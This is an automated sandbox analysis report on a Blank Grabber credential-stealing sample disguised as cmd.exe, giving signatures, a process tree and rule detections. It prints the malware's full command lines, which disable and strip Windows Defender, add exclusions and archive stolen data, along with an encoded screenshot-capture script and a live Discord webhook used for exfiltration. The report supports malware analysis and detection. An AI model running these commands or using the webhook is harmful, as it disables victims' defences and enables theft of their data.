Windows Analysis Report
cmd.exe

Overview

General Information

Sample name: cmd.exe
Analysis ID: 1561562
MD5: b2fe874c2e11c56edf05c5250a8c966f
SHA1: 06d6e28c3cb46e06195a5f8c360d8eeaddfb1c06
SHA256: 255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f
Tags: exe, user-JaffaCakes118

Detection

Blank Grabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal communication platform credentials (via file / registry access)
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cmd.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\cmd.exe" MD5: B2FE874C2E11C56EDF05C5250A8C966F)
    • cmd.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\cmd.exe" MD5: B2FE874C2E11C56EDF05C5250A8C966F)
      • cmd.exe (PID: 7332 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7560 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7340 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7484 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 4476 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7356 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 7516 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 7380 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7536 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7864 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8032 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7892 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8008 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 8076 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3636 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8088 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2540 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8100 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 6552 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 8108 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 2936 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 1908 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 7888 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 2188 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8276 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 4592 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8300 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 8540 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 8688 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES74CA.tmp" "c:\Users\user\AppData\Local\Temp\bcdu5fii\CSC91B7380AF2C2414A909984B12C6688DE.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 8396 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8444 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8476 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 8552 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 8600 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8672 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8772 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8828 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8852 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8904 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 9148 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 9204 cmdline: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 7876 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7700 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7844 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8160 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5480 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 1076 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 2008 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8396 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6036 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8392 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8636 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8564 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 6044 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

{"C2 url": "https://discord.com/api/webhooks/1309732604697772032/jYDmGek7yWvABusaZDozvumeMuAZjheHcNL9cOnpMCpam2eP5UOyLvUjSMysvJJlJbg0"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\_MEI72642\rarreg.key | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |

Source | Rule | Description | Author | Strings
00000001.00000002.2096102942.000001C916489000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000000.00000003.1701296843.00000162C4354000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000001.00000002.2098275549.000001C916C2C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000000.00000003.1701296843.00000162C4352000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
(5 of 7 entries shown)

              System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\cmd.exe", ParentImage: C:\Users\user\Desktop\cmd.exe, ParentProcessId: 7280, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'", ProcessId: 7332, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\cmd.exe", ParentImage: C:\Users\user\Desktop\cmd.exe, ParentProcessId: 7280, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7340, ProcessName: cmd.exe
Source: Process started | Author: @ROxPinTeddy | Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\cmd.exe", ParentImage: C:\Users\user\Desktop\cmd.exe, ParentProcessId: 7280, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *", ProcessId: 9148, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community | Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\cmd.exe, ProcessId: 7280, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUA
ZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
